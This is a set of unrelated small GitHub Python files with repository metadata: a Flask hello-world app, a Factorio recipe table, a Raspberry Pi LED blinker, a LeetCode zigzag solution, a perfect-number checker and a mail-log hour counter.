dbd30435ecd8070d3826ac6105f00a019a270108 | 4c9af1f8223ad09fcfa65572840e478ebf3be66a | /python/app.py | c8115bcad7405a72f9c278882192dcb948b2c333 | [] | no_license | Michhud/content-gitops | 14ee9a3388002010255af9276838120757ffab0e | fe5dcc6c152ba5a69a9c66ae591c474249971441 | refs/heads/master | 2023-07-31T12:27:59.211821 | 2021-10-01T09:03:38 | 2021-10-01T09:03:38 | 412,072,710 | 0 | 0 | null | 2021-10-01T07:57:28 | 2021-09-30T13:18:46 | Python | UTF-8 | Python | false | false | 175 | py | from flask import Flask
app = Flask(__name__)


@app.route("/")
def hello():
    # Single route: greet visitors at the site root.
    return "Hello UvA student!"


if __name__ == "__main__":
    # 0.0.0.0 binds all interfaces so the server is reachable from
    # outside the host loopback.
    app.run(host='0.0.0.0', port=8000)
| [
"noreply@github.com"
] | Michhud.noreply@github.com |
decd9e6091b57449c7b7819c3f56ee801c7e18c7 | c74f732f38d6448b0efce232b08520415ba79144 | /personal/factorio/fact/processes.py | e4b64cf2177d9662c8a3c967a0d7664ad80f216d | [] | no_license | chuck1/python | 6910a32d85ffb7faa41cb1cf8cd1a437d9562b13 | 3dac080f7452528345e88eb62a77333af077bda0 | refs/heads/master | 2020-05-31T15:23:06.392592 | 2018-04-29T16:28:44 | 2018-04-29T16:28:44 | 13,030,890 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,969 | py | import math
import itertools
import crayons
import numpy as np
import scipy.optimize
from products import *
# Give every Process access to the shared electrical-energy product.
Process.electrical_energy = electrical_energy

# Recipe table. By the convention used throughout this file, a positive
# ProductInput amount is consumed and a negative amount is produced
# (every recipe's own output appears with a negative amount).
mine_water = Process(
    "mine_water",
    [
        ProductInput(water, -1200),
    ],
    1,
)
mine_crude_oil = Process(
"mine_crude_oil",
[
ProductInput(crude_oil, -50),
],
1,
has_site=True,
building=pumpjack,
)
produce_pumpjack = Process(
"pumpjack",
[
ProductInput(electronic_circuit, 5),
ProductInput(iron_gear_wheel, 10),
ProductInput(pipe, 10),
ProductInput(steel_plate, 5),
ProductInput(pumpjack, -1),
],
5,
)
advanced_oil_processing = Process(
"advanced_oil_processing",
[
ProductInput(crude_oil, 100),
ProductInput(water, 50),
ProductInput(heavy_oil, -10),
ProductInput(light_oil, -45),
ProductInput(petroleum, -55),
],
5,
420,
has_site=True,
building=oil_refinery,
)
basic_oil_processing = Process(
"basic oil processing",
[
ProductInput(crude_oil, 100),
ProductInput(heavy_oil, -30),
ProductInput(light_oil, -30),
ProductInput(petroleum, -40),
],
5,
420,
building=oil_refinery,
)
mine_stone = Process(
"mine stone",
[
ProductInput(stone, -0.65),
],
1,
90,
has_site=True,
building=electric_mining_drill,
)
produce_stone_brick = Process(
"stone brick",
[
ProductInput(stone, 2, 1),
ProductInput(stone_brick, -1, 1),
],
3.5,
has_site=True,
building=electric_furnace,
)
mine_iron_ore = Process(
"mine iron ore",
[
ProductInput(iron_ore, -1),
],
1.905,
90,
has_site=True,
building=electric_mining_drill,
)
mine_copper_ore = Process(
"mine copper ore",
[
ProductInput(copper_ore, -0.525),
],
1,
90,
has_site=True,
building=electric_mining_drill,
)
mine_coal = Process(
"mine coal",
[
ProductInput(coal, -0.525),
],
1,
90,
has_site=True,
building=electric_mining_drill,
)
mine_uranium_ore = Process(
"uranium_ore",
[
ProductInput(sulfuric_acid, 1),
ProductInput(uranium_ore, -1),
],
1.905,
has_site=True,
building=electric_mining_drill,
)
uranium_processing = Process(
"uranium processing",
[
ProductInput(uranium_ore, 10),
ProductInput(uranium_235, -0.007),
ProductInput(uranium_238, -0.993),
],
10,
)
uranium_enrichment = Process(
"uranium enrichment",
[
ProductInput(uranium_238, 3),
ProductInput(uranium_235, -1),
],
50,
)
produce_uranium_fuel_cell = Process(
"uranium fuel cell",
[
ProductInput(iron_plate, 10),
ProductInput(uranium_235, 1),
ProductInput(uranium_238, 19),
ProductInput(uranium_fuel_cell, -10),
],
10,
)
produce_plastic_bar = Process(
"plastic bar",
[
ProductInput(coal, 1, 2),
ProductInput(petroleum, 20),
ProductInput(plastic_bar, -2, 1),
],
1,
has_site=True,
building=chemical_plant,
)
produce_sulfur = Process(
"sulfur",
[
ProductInput(petroleum, 30),
ProductInput(water, 30),
ProductInput(sulfur, -2, 1),
],
1,
has_site=True,
building=chemical_plant,
)
produce_iron_plate = Process(
"iron plate",
[
ProductInput(iron_ore, 0.57, 2),
ProductInput(iron_plate, -0.57, 2),
],
1,
180,
has_site=True,
building=electric_furnace,
)
produce_copper_plate = Process(
"copper plate",
[
ProductInput(copper_ore, 0.57, 2),
ProductInput(copper_plate, -0.57, 2),
],
1,
180,
has_site=True,
building=electric_furnace,
)
produce_copper_cable = Process(
"copper cable",
[
ProductInput(copper_plate, 1, 1),
ProductInput(copper_cable, -2, 2),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_steel_plate = Process("steel plate",
[
ProductInput(iron_plate, 5, 2),
ProductInput(steel_plate, -1, 1),
],
8.772,
180,
has_site=True,
building=electric_furnace,
)
produce_lubricant = Process(
"lubricant",
[
ProductInput(heavy_oil, 10, 1),
ProductInput(lubricant, -10),
],
1,
has_site=True,
building=chemical_plant,
)
produce_sulfuric_acid = Process(
"sulfuric acid",
[
ProductInput(iron_plate, 1, 1),
ProductInput(sulfur, 5, 1),
ProductInput(sulfuric_acid, -50),
],
1,
has_site=True,
building=chemical_plant,
)
produce_electronic_circuit = Process("electronic circuit",
[
ProductInput(iron_plate, 1, 1),
ProductInput(copper_cable, 3, 2),
ProductInput(electronic_circuit, -1, 1),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_advanced_circuit = Process(
"advanced circuit",
[
ProductInput(copper_cable, 4, 1),
ProductInput(electronic_circuit, 2, 0.5),
ProductInput(plastic_bar, 2, 0.5),
ProductInput(advanced_circuit, -1, 1),
],
6,
has_site=True,
building=assembling_machine_3,
)
produce_processing_unit = Process("processing unit",
[
ProductInput(electronic_circuit, 20, 2),
ProductInput(advanced_circuit, 2, 1),
ProductInput(sulfuric_acid, 5),
ProductInput(processing_unit, -1, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_speed_module_1 = Process("speed module 1",
[
ProductInput(electronic_circuit, 5.0),
ProductInput(advanced_circuit, 5.0),
ProductInput(speed_module_1, -1, 1),
],
15,
has_site=True,
building=assembling_machine_3,
)
produce_speed_module_2 = Process(
"speed module 2",
[
ProductInput(advanced_circuit, 5.0),
ProductInput(processing_unit, 5.0),
ProductInput(speed_module_1, 4.0),
ProductInput(speed_module_2, -1, 1),
],
30,
building=assembling_machine_3,
)
produce_speed_module_3 = Process("speed module 3",
[
ProductInput(advanced_circuit, 5.0),
ProductInput(processing_unit, 5.0),
ProductInput(speed_module_2, 5.0),
ProductInput(speed_module_3, -1, 1),
],
60,
building=assembling_machine_3,
)
produce_battery = Process("battery",
[
ProductInput(iron_plate, 1, 1),
ProductInput(copper_plate, 1, 1),
ProductInput(sulfuric_acid, 20),
ProductInput(battery, -1, 1)
],
5,
has_site=True,
building=chemical_plant,
)
produce_accumulator = Process("accumulator",
[
ProductInput(iron_plate, 2, 1),
ProductInput(battery, 5, 2),
ProductInput(accumulator, -1, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_low_density_structure = Process("low_density_structure",
[
ProductInput(copper_plate, 5, 1),
ProductInput(plastic_bar, 5, 1),
ProductInput(steel_plate, 10, 1),
ProductInput(low_density_structure, -1, 1),
],
30,
has_site=True,
building=assembling_machine_3,
)
produce_iron_gear_wheel = Process(
"iron_gear_wheel",
[
ProductInput(iron_plate, 2, 2),
ProductInput(iron_gear_wheel, -1, 1),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_radar = Process("radar",
[
ProductInput(electronic_circuit, 5),
ProductInput(iron_gear_wheel, 5),
ProductInput(iron_plate, 10),
ProductInput(radar, -1, 1),
],
0.5,
building=assembling_machine_3,
)
heavy_oil_to_solid_fuel = Process(
"heavy oil to solid fuel",
[
ProductInput(heavy_oil, 20),
ProductInput(solid_fuel, -1, 1),
],
3,
building=chemical_plant,
)
light_oil_to_solid_fuel = Process(
"light oil to solid fuel",
[
ProductInput(light_oil, 10),
ProductInput(solid_fuel, -1, 1),
],
3,
building=chemical_plant,
)
produce_chemical_plant = Process(
"chemical plant",
[
ProductInput(electronic_circuit, 5, 1),
ProductInput(iron_gear_wheel, 5, 1),
ProductInput(pipe, 5, 1),
ProductInput(steel_plate, 5, 1),
ProductInput(chemical_plant, -1, 1),
],
5,
210,
building=assembling_machine_3,
)
produce_rocket_fuel = Process(
"rocket_fuel",
[
ProductInput(solid_fuel, 10, 2),
ProductInput(rocket_fuel, -1, 1),
],
30,
has_site=True,
building=assembling_machine_3,
)
produce_solar_panel = Process("solar_panel",
[
ProductInput(copper_plate, 5),
ProductInput(electronic_circuit, 15),
ProductInput(steel_plate, 5),
ProductInput(solar_panel, -1, 1),
],
10,
building=assembling_machine_3,
)
produce_satellite = Process(
"satellite",
[
ProductInput(accumulator, 100),
ProductInput(low_density_structure, 100),
ProductInput(processing_unit, 100),
ProductInput(radar, 5),
ProductInput(rocket_fuel, 50),
ProductInput(solar_panel, 100),
ProductInput(satellite, -1, 1),
],
5,
building=assembling_machine_3,
)
produce_rocket_control_unit = Process(
"rocket control unit",
[
ProductInput(processing_unit, 1),
ProductInput(speed_module_1, 1),
ProductInput(rocket_control_unit, -1, 1),
],
30,
building=assembling_machine_3,
)
produce_rocket_part = Process("rocket_part",
[
ProductInput(low_density_structure, 10),
ProductInput(rocket_control_unit, 10),
ProductInput(rocket_fuel, 10),
ProductInput(rocket_part, -1),
],
3,
4000,
building=rocket_silo,
)
# A launch consumes a full rocket (100 parts) plus the satellite and
# yields 1000 space science packs.
produce_satellite_launch = Process(
    "satellite_launch",
    [
        ProductInput(rocket_part, 100),
        ProductInput(satellite, 1),
        #ProductInput(satellite_launch, -1, 1),
        ProductInput(space_science_pack, -1000, 1),
    ],
    0,  # NOTE(review): zero cycle time models the launch as instantaneous — confirm intended
    has_site=True,
)
produce_inserter = Process("inserter",
[
ProductInput(electronic_circuit, 1, 1),
ProductInput(iron_gear_wheel, 1, 1),
ProductInput(iron_plate, 1, 1),
ProductInput(inserter, -1, 1),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_fast_inserter = Process("fast inserter",
[
ProductInput(electronic_circuit, 2, 1),
ProductInput(inserter, 1, 1),
ProductInput(iron_plate, 2, 1),
ProductInput(fast_inserter, -1, 1),
],
0.5,
has_site=True,
)
produce_stack_inserter = Process("stack inserter",
[
ProductInput(advanced_circuit, 1, 1),
ProductInput(electronic_circuit, 15, 1),
ProductInput(fast_inserter, 1, 1),
ProductInput(iron_gear_wheel, 15, 1),
ProductInput(stack_inserter, -1, 1),
],
0.5,
has_site=True,
)
produce_stack_filter_inserter = Process(
"stack filter inserter",
[
ProductInput(electronic_circuit, 5, 1),
ProductInput(stack_inserter, 1, 1),
ProductInput(stack_filter_inserter, -1, 1),
],
0.5,
has_site=True,
)
produce_transport_belt = Process(
"transport_belt",
[
ProductInput(iron_gear_wheel, 1, 1),
ProductInput(iron_plate, 1, 1),
ProductInput(transport_belt, -1, 1),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_fast_transport_belt = Process(
"fast transport belt",
[
ProductInput(iron_gear_wheel, 5, 1),
ProductInput(transport_belt, 1, 1),
ProductInput(fast_transport_belt, -1, 1),
],
0.5,
)
produce_express_transport_belt = Process(
"express transport belt",
[
ProductInput(fast_transport_belt, 1, 1),
ProductInput(iron_gear_wheel, 10, 1),
ProductInput(lubricant, 20),
ProductInput(express_transport_belt, -1, 1),
],
0.5,
)
produce_electric_furnace = Process(
"electric furnace",
[
ProductInput(advanced_circuit, 5, 1),
ProductInput(steel_plate, 10, 1),
ProductInput(stone_brick, 10, 1),
ProductInput(electric_furnace, -1, 1),
],
5,
has_site=True,
building=assembling_machine_3,
)
produce_electric_mining_drill = Process(
"electric mining drill",
[
ProductInput(electronic_circuit, 3, 0.5),
ProductInput(iron_gear_wheel, 5, 0.5),
ProductInput(iron_plate, 10, 0.5),
ProductInput(electric_mining_drill, -1, 1),
],
2,
has_site=True,
building=assembling_machine_3,
)
produce_science_pack_1 = Process("science pack 1",
[
ProductInput(copper_plate, 1, 0.5),
ProductInput(iron_gear_wheel, 1, 0.5),
ProductInput(science_pack_1, -1, 1),
],
5,
has_site=True,
building=assembling_machine_3,
)
produce_science_pack_2 = Process("science pack 2",
[
ProductInput(inserter, 1, 0.5),
ProductInput(transport_belt, 1, 0.5),
ProductInput(science_pack_2, -1, 1),
],
6,
has_site=True,
building=assembling_machine_3,
)
produce_science_pack_3 = Process(
"science pack 3",
[
ProductInput(advanced_circuit, 1, 0.5),
ProductInput(electric_mining_drill, 1, 0.5),
ProductInput(engine_unit, 1, 0.5),
ProductInput(science_pack_3, -1, 1),
],
12,
has_site=True,
building=assembling_machine_3,
)
produce_military_science_pack = Process(
"military science pack",
[
ProductInput(grenade, 1, 1),
ProductInput(gun_turret, 1, 1),
ProductInput(piercing_rounds_magazine, 1, 1),
ProductInput(military_science_pack, -2, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_production_science_pack = Process(
"production science pack",
[
ProductInput(electric_engine_unit, 1, 1),
ProductInput(electric_furnace, 1, 1),
ProductInput(production_science_pack, -2, 1),
],
14,
has_site=True,
building=assembling_machine_3,
)
produce_high_tech_science_pack = Process(
"high tech science pack",
[
ProductInput(battery, 1, 1),
ProductInput(copper_cable, 30, 1),
ProductInput(processing_unit, 3, 1),
ProductInput(speed_module_1, 1, 1),
ProductInput(high_tech_science_pack, -2, 1),
],
14,
has_site=True,
building=assembling_machine_3,
)
produce_firearm_magazine = Process(
"firearm magazine",
[
ProductInput(iron_plate, 4, 1),
ProductInput(firearm_magazine, -1, 1),
],
1,
has_site=True,
)
produce_piercing_rounds_magazine = Process(
"piercing rounds magazine",
[
ProductInput(copper_plate, 5, 1),
ProductInput(firearm_magazine, 1, 1),
ProductInput(steel_plate, 1, 1),
ProductInput(piercing_rounds_magazine, -1, 1),
],
3,
has_site=True,
)
produce_defender_capsule = Process(
"defender capsule",
[
ProductInput(electronic_circuit, 2, 1),
ProductInput(iron_gear_wheel, 3, 1),
ProductInput(piercing_rounds_magazine, 1, 1),
ProductInput(defender_capsule, -1, 1),
],
8,
)
produce_distractor_capsule = Process(
"distractor capsule",
[
ProductInput(advanced_circuit, 3, 1),
ProductInput(defender_capsule, 4, 1),
ProductInput(distractor_capsule, -1, 1),
],
15,
)
produce_destroyer_capsule = Process(
"destroyer capsule",
[
ProductInput(distractor_capsule, 4, 1),
ProductInput(speed_module_1, 1, 1),
ProductInput(destroyer_capsule, -1, 1),
],
15,
)
solar_power = Process(
"solar power",
[
ProductInput(electrical_energy, -42),
],
1,
)
#includes 300% neighbor bonus
nuclear_power = Process(
"nuclear power",
[
ProductInput(uranium_fuel_cell, 1),
ProductInput(heat_energy, -8000000 * 4),
],
200,
building=nuclear_reactor
)
heat_exchanger_process = Process(
"heat exchanger process",
[
ProductInput(heat_energy, 10000),
ProductInput(steam_500, -10000 / 97),
],
1,
)
steam_turbine_process = Process(
"steam turbine process",
[
ProductInput(steam_500, 60),
ProductInput(electrical_energy, -60 * steam_500.energy),
],
1,
building=steam_turbine
)
research = Process(
"research",
[
ProductInput(science_pack_1, 1),
ProductInput(science_pack_2, 1),
ProductInput(science_pack_3, 1),
ProductInput(military_science_pack, 1),
ProductInput(production_science_pack, 1),
ProductInput(high_tech_science_pack, 1),
ProductInput(space_science_pack, 1),
ProductInput(research_phantom, -1),
],
1,
has_site=True,
building=lab,
)
produce_engine_unit = Process(
"engine unit",
[
ProductInput(iron_gear_wheel, 1, 0.5),
ProductInput(pipe, 2, 0.5),
ProductInput(steel_plate, 1, 0.5),
ProductInput(engine_unit, -1, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_electric_engine_unit = Process(
"electric engine unit",
[
ProductInput(electronic_circuit, 2, 1),
ProductInput(engine_unit, 1, 1),
ProductInput(lubricant, 15),
ProductInput(electric_engine_unit, -1, 1),
],
10,
has_site=True,
building=assembling_machine_3,
)
produce_pipe = Process(
"pipe",
[
ProductInput(iron_plate, 1, 1),
ProductInput(pipe, -1, 1),
],
0.5,
has_site=True,
)
produce_explosives = Process(
"explosives",
[
ProductInput(coal, 1, 1),
ProductInput(sulfur, 1, 1),
ProductInput(water, 10, 1),
ProductInput(explosives, -1, 1),
],
5,
)
produce_explosive_cannon_shell = Process(
"explosive_cannon_shell",
[
ProductInput(explosives, 2, 1),
ProductInput(plastic_bar, 2, 1),
ProductInput(steel_plate, 2, 1),
ProductInput(explosive_cannon_shell, -1, 1),
],
8,
)
produce_artillery_shell = Process(
"artillery_shell",
[
ProductInput(explosive_cannon_shell, 4, 1),
ProductInput(explosives, 8, 1),
ProductInput(radar, 1, 1),
ProductInput(artillery_shell, -1, 1),
],
15,
)
produce_gun_turret = Process(
"gun turret",
[
ProductInput(copper_plate, 10, 1),
ProductInput(iron_gear_wheel, 10, 1),
ProductInput(iron_plate, 20, 1),
ProductInput(gun_turret, -1, 1),
],
8,
has_site=True,
building=assembling_machine_3,
)
produce_rail = Process(
"rail",
[
ProductInput(iron_stick, 1, 1),
ProductInput(steel_plate, 1, 1),
ProductInput(stone, 1, 1),
ProductInput(rail, -2, 1),
],
0.5,
)
produce_iron_stick = Process(
"iron stick",
[
ProductInput(iron_plate, 1, 1),
ProductInput(iron_stick, -2, 1),
],
0.5,
)
produce_grenade = Process(
"grenade",
[
ProductInput(coal, 10, 1),
ProductInput(iron_plate, 5, 1),
ProductInput(grenade, -1, 1),
],
8,
has_site=True,
building=assembling_machine_3,
)
produce_nuclear_reactor = Process(
"nuclear reactor",
[
ProductInput(advanced_circuit, 500),
ProductInput(concrete, 500),
ProductInput(copper_plate, 500),
ProductInput(steel_plate, 500),
ProductInput(nuclear_reactor, -1),
],
3,
)
produce_concrete = Process(
"concrete",
[
ProductInput(iron_ore, 1),
ProductInput(stone_brick, 5),
ProductInput(water, 100),
ProductInput(concrete, -10),
],
10,
)
produce_heat_exchanger = Process(
"heat exchanger",
[
ProductInput(copper_plate, 100),
ProductInput(pipe, 10),
ProductInput(steel_plate, 10),
ProductInput(heat_exchanger, -1),
],
3,
)
produce_steam_turbine = Process(
"steam turbine",
[
ProductInput(copper_plate, 50),
ProductInput(iron_gear_wheel, 50),
ProductInput(pipe, 20),
ProductInput(steam_turbine, -1),
],
3,
)
produce_assembling_machine_1 = Process(
"assembling machine 1",
[
ProductInput(electronic_circuit, 3),
ProductInput(iron_gear_wheel, 5),
ProductInput(iron_plate, 9),
ProductInput(assembling_machine_1, -1),
],
0.5,
building=assembling_machine_3
)
produce_assembling_machine_2 = Process(
"assembling machine 2",
[
ProductInput(assembling_machine_1, 1),
ProductInput(electronic_circuit, 3),
ProductInput(iron_gear_wheel, 5),
ProductInput(iron_plate, 9),
ProductInput(assembling_machine_2, -1),
],
0.5,
building=assembling_machine_3
)
produce_assembling_machine_3 = Process(
"assembling machine 3",
[
ProductInput(assembling_machine_2, 2),
ProductInput(speed_module_1, 4),
ProductInput(assembling_machine_3, -1),
],
0.5,
building=assembling_machine_3
)
produce_rail_signal = Process(
"rail signal",
[
ProductInput(electronic_circuit, 1),
ProductInput(iron_plate, 5),
ProductInput(rail_signal, -1),
],
0.5,
building=assembling_machine_3
)
produce_rail_chain_signal = Process(
"rail chain signal",
[
ProductInput(electronic_circuit, 1),
ProductInput(iron_plate, 5),
ProductInput(rail_chain_signal, -1),
],
0.5,
building=assembling_machine_3
)
produce_rocket_silo = Process(
"rocket silo",
[
ProductInput(concrete, 1000),
ProductInput(electric_engine_unit, 200),
ProductInput(pipe, 100),
ProductInput(processing_unit, 200),
ProductInput(steel_plate, 1000),
ProductInput(rocket_silo, -1),
],
30,
building=assembling_machine_3,
)
produce_oil_refinery = Process(
"oil refinery",
[
ProductInput(electronic_circuit, 10),
ProductInput(iron_gear_wheel, 10),
ProductInput(pipe, 10),
ProductInput(steel_plate, 15),
ProductInput(stone_brick, 10),
ProductInput(oil_refinery, -1),
],
8,
)
produce_lab = Process(
"lab",
[
ProductInput(electronic_circuit, 10),
ProductInput(iron_gear_wheel, 10),
ProductInput(transport_belt, 4),
ProductInput(lab, -1),
],
2,
)
produce_new_base_supplies = Process(
"new base supplies",
[
ProductInput(stack_filter_inserter, 48),
ProductInput(express_transport_belt, 200),
ProductInput(rail, 100),
ProductInput(rail_signal, 20),
ProductInput(rail_chain_signal, 20),
ProductInput(new_base_supplies, -1),
],
0,
)
# Top-level demand recipe: the aggregate outputs the factory must supply
# per 60-unit cycle.
production = Process("production",
    [
        # NOTE(review): speed_module_3 is listed three times at 1/3 each
        # (net 1.0 per cycle) — presumably one entry per consumer slot;
        # confirm the triplication is intentional.
        ProductInput(speed_module_3, 1 / 3),
        ProductInput(speed_module_3, 1 / 3),
        ProductInput(speed_module_3, 1 / 3),
        ProductInput(satellite_launch, 1),
        ProductInput(destroyer_capsule, 1 / 1),
        ProductInput(piercing_rounds_magazine, 1 / 1),
        ProductInput(science_pack_1, 10),
        ProductInput(science_pack_2, 10),
        ProductInput(science_pack_3, 10),
        ProductInput(military_science_pack, 10),
        ProductInput(production_science_pack, 10),
        ProductInput(high_tech_science_pack, 10),
        ProductInput(space_science_pack, 10),
        ProductInput(new_base_supplies, 1 / 30),
        ProductInput(artillery_shell, 10),
    ],
    60,
)
# --- Default producer registration -------------------------------------
# Each product records the process that produces it by default, so demand
# for a product can be resolved back to the recipe that makes it.
research_phantom.process_default = research
pumpjack.process_default = produce_pumpjack
lab.process_default = produce_lab
oil_refinery.process_default = produce_oil_refinery
rocket_silo.process_default = produce_rocket_silo
rail_signal.process_default = produce_rail_signal
rail_chain_signal.process_default = produce_rail_chain_signal
assembling_machine_1.process_default = produce_assembling_machine_1
assembling_machine_2.process_default = produce_assembling_machine_2
assembling_machine_3.process_default = produce_assembling_machine_3
concrete.process_default = produce_concrete
nuclear_reactor.process_default = produce_nuclear_reactor
heat_exchanger.process_default = produce_heat_exchanger
steam_turbine.process_default = produce_steam_turbine
heat_energy.process_default = nuclear_power
steam_500.process_default = heat_exchanger_process
uranium_235.process_default = uranium_enrichment
uranium_238.process_default = uranium_processing
uranium_ore.process_default = mine_uranium_ore
uranium_fuel_cell.process_default = produce_uranium_fuel_cell
space_science_pack.process_default = produce_satellite_launch
high_tech_science_pack.process_default = produce_high_tech_science_pack
stone_brick.process_default = produce_stone_brick
production_science_pack.process_default = produce_production_science_pack
gun_turret.process_default = produce_gun_turret
grenade.process_default = produce_grenade
electric_furnace.process_default = produce_electric_furnace
electric_engine_unit.process_default = produce_electric_engine_unit
military_science_pack.process_default = produce_military_science_pack
iron_stick.process_default = produce_iron_stick
rail.process_default = produce_rail
lubricant.process_default = produce_lubricant
fast_transport_belt.process_default = produce_fast_transport_belt
express_transport_belt.process_default = produce_express_transport_belt
stone.process_default = mine_stone
explosives.process_default = produce_explosives
explosive_cannon_shell.process_default = produce_explosive_cannon_shell
artillery_shell.process_default = produce_artillery_shell
new_base_supplies.process_default = produce_new_base_supplies
pipe.process_default = produce_pipe
engine_unit.process_default = produce_engine_unit
firearm_magazine.process_default = produce_firearm_magazine
piercing_rounds_magazine.process_default = produce_piercing_rounds_magazine
defender_capsule.process_default = produce_defender_capsule
distractor_capsule.process_default = produce_distractor_capsule
destroyer_capsule.process_default = produce_destroyer_capsule
rocket_control_unit.process_default = produce_rocket_control_unit
rocket_part.process_default = produce_rocket_part
satellite_launch.process_default = produce_satellite_launch
speed_module_1.process_default = produce_speed_module_1
speed_module_2.process_default = produce_speed_module_2
speed_module_3.process_default = produce_speed_module_3
electric_mining_drill.process_default = produce_electric_mining_drill
transport_belt.process_default = produce_transport_belt
science_pack_1.process_default = produce_science_pack_1
science_pack_2.process_default = produce_science_pack_2
science_pack_3.process_default = produce_science_pack_3
inserter.process_default = produce_inserter
fast_inserter.process_default = produce_fast_inserter
stack_inserter.process_default = produce_stack_inserter
stack_filter_inserter.process_default = produce_stack_filter_inserter
solar_panel.process_default = produce_solar_panel
rocket_fuel.process_default = produce_rocket_fuel
iron_gear_wheel.process_default = produce_iron_gear_wheel
radar.process_default = produce_radar
advanced_circuit.process_default = produce_advanced_circuit
copper_cable.process_default = produce_copper_cable
electronic_circuit.process_default = produce_electronic_circuit
processing_unit.process_default = produce_processing_unit
steel_plate.process_default = produce_steel_plate
coal.process_default = mine_coal
plastic_bar.process_default = produce_plastic_bar
low_density_structure.process_default = produce_low_density_structure
electrical_energy.process_default = steam_turbine_process
water.process_default = mine_water
crude_oil.process_default = mine_crude_oil
petroleum.process_default = advanced_oil_processing
sulfur.process_default = produce_sulfur
sulfuric_acid.process_default = produce_sulfuric_acid
battery.process_default = produce_battery
iron_ore.process_default = mine_iron_ore
iron_plate.process_default = produce_iron_plate
copper_ore.process_default = mine_copper_ore
copper_plate.process_default = produce_copper_plate
accumulator.process_default = produce_accumulator
satellite.process_default = produce_satellite
solid_fuel.process_default = light_oil_to_solid_fuel
light_oil.process_default = advanced_oil_processing
heavy_oil.process_default = advanced_oil_processing
chemical_plant.process_default = produce_chemical_plant
| [
"charles.rymal@nortek.com"
] | charles.rymal@nortek.com |
0e3488ef3a1d4b32b2ad0716ed23d7df856f9fe8 | 9db1b68112c9fd0f4f8a84bd7a57f80eef4dc2ed | /rasppi/led_ex.py | 04c8199b9cfbc59e30b60ff91076c82281f58192 | [] | no_license | mangoJakeShin/bit_academy | 464bc9cfb71ec03ad368b7d6e6a0f837f75ce9bf | d59508b6dc373301fd3abdd53ebe622520fd3982 | refs/heads/main | 2023-02-17T03:17:29.025738 | 2021-01-19T01:29:51 | 2021-01-19T01:29:51 | 303,314,532 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(6, GPIO.OUT)
GPIO.setup(26, GPIO.OUT)
def GPon(a,b):
GPIO.output(a,True)
time.sleep(b)
def GPoff(a,b):
GPIO.output(a,False)
time.sleep(b)
def GPctrl(gpnum,on,off):
GPon(gpnum,on)
GPoff(gpnum,off)
while(True):
GPctrl(17, 1, 0.2)
GPctrl(6, 1, 1)
GPctrl(26, 1, 1)
| [
"yellowman2@naver.com"
] | yellowman2@naver.com |
ff5481487e54507a28f7f346fc73b088e009771b | fcc88521f63a3c22c81a9242ae3b203f2ea888fd | /Python3/0006-ZigZag-Conversion/soln.py | f2d94cda1de538a16f8a63dbbbb03073bd1a954e | [
"MIT"
] | permissive | wyaadarsh/LeetCode-Solutions | b5963e3427aa547d485d3a2cb24e6cedc72804fd | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | refs/heads/master | 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 | MIT | 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | null | UTF-8 | Python | false | false | 510 | py | import functools
class Solution:
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or len(s) <= numRows:
return s
rows = [[] for _ in range(numRows)]
row, drow = 0, 1
for ch in s:
rows[row].append(ch)
row += drow
if row == 0 or row == numRows - 1:
drow = -drow
return ''.join(functools.reduce(operator.add, rows)) | [
"zhang623@wisc.edu"
] | zhang623@wisc.edu |
1e7b2594ee76d52af756fe706e37e3af5004a494 | bdac572800f7ca27d7be2ea84cbf3c58bbb8ad7c | /Math/PerfectNumber.py | 4803f96773414f1b28373a6599bd63ea7fb21955 | [] | no_license | msbvarma/CrackingTheCodingInterview | a5159ce960f3bc265624ef9f505422c73c99c794 | 930d2aea755dec58262ca8d66aa1f6d63569ff87 | refs/heads/master | 2022-01-31T02:26:15.743289 | 2022-01-27T01:18:58 | 2022-01-27T01:18:58 | 137,708,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | # number is perfect or not
# Returns true if n is perfect
def isPerfect( n ):
# To store sum of divisors
sum = 1
# Find all divisors and add them
i = 2
while i * i <= n:
if n % i == 0:
sum = sum + i + n/i
i += 1
# If sum of divisors is equal to
# n, then n is a perfect number
return (True if sum == n and n!=1 else False)
# Driver program
print("Below are all perfect numbers till 10000")
n = 2
for n in range (10000):
if isPerfect (n):
print(n , " is a perfect number")
| [
"msbvarma@users.noreply.github.com"
] | msbvarma@users.noreply.github.com |
6017ee3e478f57134bab5e1b99b78ac9eb3899be | 38d8daf256c1529458e10c3eb3869bc384de6e4a | /10.2.py | 6a2ae4dc4a690d6ddd3285b18d5b092667992a13 | [] | no_license | amandaabalos/mbox-short | 5a8c75dc35d3711efee57319604366cb0f7f1cbe | 1bd59755427743681cd598af9d756458ff877e8b | refs/heads/master | 2021-08-19T08:59:52.153413 | 2020-09-02T19:53:13 | 2020-09-02T19:53:13 | 218,678,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | fhand=open('mbox-short.txt')
newlist=list()
for line in fhand:
line=line.rstrip()
if 'From ' in line:
words=line.split()
#print(words)
ind=words[5]
hr=ind.split(':')
#print(hr[0])
#count=count+1
#print(ind)
newlist.append(hr[0])
#print(newlist)
counts = dict()
for line in newlist:
words=line.split()
#print(words)
for word in words:
counts[word]=counts.get(word, 0)+1
#print(counts)
#counts.items()
count=counts.items()
sort=sorted(count)
#print(sort)
for k,v in sort:
print(k,v)
#for i in sort:
# lst.append(i)
# print(lst)
# word=lst[0,2]
# print(word)
#for hr in ind:
# wd=ind.split(':')
# print(wd[0])
# index=wd[0]
# #print(ind)
# count=count+1
